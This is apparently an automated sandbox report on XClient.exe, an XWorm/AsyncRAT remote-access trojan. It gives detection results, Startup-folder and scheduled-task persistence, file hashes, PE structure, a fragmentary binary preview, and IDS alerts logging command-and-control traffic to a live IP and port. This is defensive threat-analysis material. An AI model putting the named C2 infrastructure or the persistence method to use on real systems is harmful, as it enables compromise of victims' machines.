                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:XClient.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@8/3@1/2
                    EGA Information:
                    • Successful, ratio: 20%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 37
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.253.45
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target XClient.exe, PID 2132 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 3592 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 5180 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 6496 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    08:07:05API Interceptor13854016x Sleep call for process: XClient.exe modified
                    13:06:59Task SchedulerRun new task: XClient path: C:\Users\user\AppData\Roaming\XClient.exe
                    13:06:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    172.67.19.24rrats.exeGet hashmaliciousAsyncRATBrowse
                    • pastebin.com/raw/KKpnJShN
                    sys_upd.ps1Get hashmaliciousUnknownBrowse
                    • pastebin.com/raw/sA04Mwk2
                    cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                    • pastebin.com/raw/sA04Mwk2
                    cr_asm2.ps1Get hashmaliciousUnknownBrowse
                    • pastebin.com/raw/sA04Mwk2
                    cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                    • pastebin.com/raw/sA04Mwk2
                    VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                    • pastebin.com/raw/sA04Mwk2
                    HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                    • pastebin.com/raw/sA04Mwk2
                    xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                    • pastebin.com/raw/sA04Mwk2
                    steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                    • pastebin.com/raw/sA04Mwk2
                    cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                    • pastebin.com/raw/sA04Mwk2

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    pastebin.comogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                    • 104.20.4.235
                    hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                    • 172.67.19.24
                    CRf9KBk4ra.exeGet hashmaliciousDCRatBrowse
                    • 172.67.19.24
                    dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                    • 104.20.3.235
                    2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                    • 104.20.3.235
                    bad.txtGet hashmaliciousAsyncRATBrowse
                    • 104.20.3.235
                    dlhost.exeGet hashmaliciousXWormBrowse
                    • 104.20.4.235
                    htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                    • 104.20.4.235
                    c2.exeGet hashmaliciousXmrigBrowse
                    • 104.20.4.235
                    Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                    • 172.67.19.24

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    UNACS-AS-BG8000BurgasBGfile.exeGet hashmaliciousDcRat, JasonRATBrowse
                    • 87.120.113.91
                    009274965.lnkGet hashmaliciousDarkVision RatBrowse
                    • 87.120.113.91
                    hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                    • 87.120.115.216
                    rebirth.arm4t.elfGet hashmaliciousGafgytBrowse
                    • 87.120.113.63
                    rebirth.spc.elfGet hashmaliciousGafgytBrowse
                    • 87.120.113.63
                    rebirth.sh4.elfGet hashmaliciousGafgytBrowse
                    • 87.120.113.63
                    rebirth.arm5.elfGet hashmaliciousGafgytBrowse
                    • 87.120.113.63
                    rebirth.x86.elfGet hashmaliciousGafgytBrowse
                    • 87.120.113.63
                    rebirth.ppc.elfGet hashmaliciousGafgytBrowse
                    • 87.120.113.63
                    rebirth.arm6.elfGet hashmaliciousGafgytBrowse
                    • 87.120.113.63
                    CLOUDFLARENETUS7z91gvU.exeGet hashmaliciousLummaCBrowse
                    • 104.21.96.1
                    https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                    • 104.26.13.205
                    mode11_0HVJ.exeGet hashmaliciousCobaltStrikeBrowse
                    • 188.114.96.3
                    https://goatstuff.sbs/re5.mp4Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    mode11_AKUh.exeGet hashmaliciousCobaltStrikeBrowse
                    • 188.114.96.3
                    mode11_qLf2.exeGet hashmaliciousCobaltStrikeBrowse
                    • 188.114.97.3
                    mode11_UVo6.exeGet hashmaliciousCobaltStrikeBrowse
                    • 188.114.96.3
                    mode11_buqd.exeGet hashmaliciousCobaltStrikeBrowse
                    • 188.114.96.3
                    mode11_N1Fz.exeGet hashmaliciousCobaltStrikeBrowse
                    • 188.114.96.3
                    http://t1.awagama2.orgGet hashmaliciousUnknownBrowse
                    • 188.114.96.3

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    3b5074b1b5d032e5620f69f9f700ff0e1111.htaGet hashmaliciousUnknownBrowse
                    • 172.67.19.24
                    qwertyuiopasdfghjklzxcvbnm.htaGet hashmaliciousUnknownBrowse
                    • 172.67.19.24
                    W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 172.67.19.24
                    FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 172.67.19.24
                    2Mi3lKoJfj.exeGet hashmaliciousQuasarBrowse
                    • 172.67.19.24
                    RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                    • 172.67.19.24
                    RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                    • 172.67.19.24
                    ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                    • 172.67.19.24
                    Sylacauga AL License.msgGet hashmaliciousUnknownBrowse
                    • 172.67.19.24

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

                    Download File
                    Process:C:\Users\user\AppData\Roaming\XClient.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):654
                    Entropy (8bit):5.380476433908377
                    Encrypted:false
                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                    Malicious:true
                    Reputation:moderate, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                    Download File
                    Process:C:\Users\user\Desktop\XClient.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Jan 3 12:06:58 2025, mtime=Fri Jan 3 12:06:59 2025, atime=Fri Jan 3 12:06:58 2025, length=41984, window=hide
                    Category:dropped
                    Size (bytes):764
                    Entropy (8bit):5.053190431527314
                    Encrypted:false
                    SSDEEP:12:8j324I9hTWC78dY//ILp0La/djAsKrHkfpqHrHoBmV:8jDI9ws8+kU0ZAsKYfpqHrHoBm
                    MD5:A7EF7354D416D3A12E1F1B289197CA04
                    SHA1:565B54A914DA690B7D1D2BDEF652004B6CA773A1
                    SHA-256:E50C9E500CCC767E5D501C28AED1636301C62D8597A48F41B4B560AFFAC4679E
                    SHA-512:2B557608928B2A77FD4F23736E3A22BC5C6ECCEC9EAD981CF8691B5E713429E76A4C40424E488E20F41CE0E270A3FEA63777E11DD62BA97B413975A29D21FBA7
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.... ....|.^.]..0wq_.]...|.^.]..........................v.:..DG..Yr?.D..U..k0.&...&......vk.v.....-OX.]...R,_.]......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^#Z.h...........................%..A.p.p.D.a.t.a...B.V.1.....#Z.h..Roaming.@......CW.^#Z.h..........................eSe.R.o.a.m.i.n.g.....b.2.....#Z.h .XClient.exe.H......#Z.h#Z.h...........................u..X.C.l.i.e.n.t...e.x.e.......Y...............-.......X............*z......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......210979...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                    C:\Users\user\AppData\Roaming\XClient.exe

                    Download File
                    Process:C:\Users\user\Desktop\XClient.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):41984
                    Entropy (8bit):5.594602217818213
                    Encrypted:false
                    SSDEEP:768:hJn0mOvGjMI5r2NpaNFu9vsOChR6RklT:ht0raCNaFu9vsOCLYmT
                    MD5:2E525CCEBF9EDE7492931251EB66571A
                    SHA1:A0598BFFA349759FB3DCF130CF93ED41A3C3D8F4
                    SHA-256:FDEFEDD8F02446DD47723F4B1829F685F64E76B9D29002545DD4C5D5257EAE29
                    SHA-512:2E459CA08A91FE27F0C3BE7BC73E5EC9E3B10B17CE99F11372DA0E0176E8647419E8C1B0478F0D3CE763246E92B84293AB42CE9769BB8BBF3F9B3D7DDA9FEA01
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Sekoia.io
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 74%
                    • Antivirus: Virustotal, Detection: 68%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!mg................................ ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......L\..<\............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):5.594602217818213
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    • Win32 Executable (generic) a (10002005/4) 49.75%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Windows Screen Saver (13104/52) 0.07%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    File name:XClient.exe
                    File size:41'984 bytes
                    MD5:2e525ccebf9ede7492931251eb66571a
                    SHA1:a0598bffa349759fb3dcf130cf93ed41a3c3d8f4
                    SHA256:fdefedd8f02446dd47723f4b1829f685f64e76b9d29002545dd4c5d5257eae29
                    SHA512:2e459ca08a91fe27f0c3be7bc73e5ec9e3b10b17ce99f11372da0e0176e8647419e8c1b0478f0d3ce763246e92b84293ab42ce9769bb8bbf3f9b3d7dda9fea01
                    SSDEEP:768:hJn0mOvGjMI5r2NpaNFu9vsOChR6RklT:ht0raCNaFu9vsOCLYmT
                    TLSH:0A135C0837E04626D9FF6FF959F362030B31E5035913D7AE0CE5899B1B67B84CA4179A
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!mg................................. ........@.. ....................................@................................

                    File Icon

                    Icon Hash:90cececece8e8eb0

                    Static PE Info

                    General

                    Entrypoint:0x40b8de
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x676D21E8 [Thu Dec 26 09:29:12 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb8880x53.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4d8.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000x98e40x9a00671f9584bf24256d711c81f614358341False0.4957132711038961data5.713572049892492IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rsrc0xc0000x4d80x6002472af5ddbb53779b7381f16b8b9407bFalse0.3756510416666667data3.7216503306685733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0xe0000xc0x20024f7d304061bf2d9404c5ca731b0cde8False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_VERSION0xc0a00x244data0.4724137931034483
                    RT_MANIFEST0xc2e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                    Imports

                    DLLImport
                    mscoree.dll_CorExeMain

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2025-01-03T14:07:19.183005+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:07:19.356985+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:07:19.383879+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:07:26.053811+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:07:26.053811+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:07:32.199336+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:07:32.200994+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:07:45.057721+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:07:45.119776+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:07:55.943481+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:07:55.943481+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:07:57.899617+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:07:57.900946+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:07.931512+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:07.937369+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:08.429735+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:08.431252+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:18.960693+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:18.962533+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:19.131552+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:19.225076+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:19.225960+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:19.312128+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:19.314165+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:19.358606+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:19.361315+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:19.477694+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:19.479640+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:25.839737+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:25.847864+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:25.963366+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:25.963366+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:29.322721+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:29.328176+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:29.409395+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:29.411984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:29.503593+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:29.505485+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:29.597019+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:29.603256+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:34.622947+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:34.624385+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:34.716125+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:34.717433+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:34.809161+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:34.810988+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:34.894946+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:34.896488+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:34.989565+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:34.991018+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:35.084120+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:35.085619+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:35.178907+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:35.184981+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:47.867467+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:47.869276+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:48.601585+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:48.602944+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
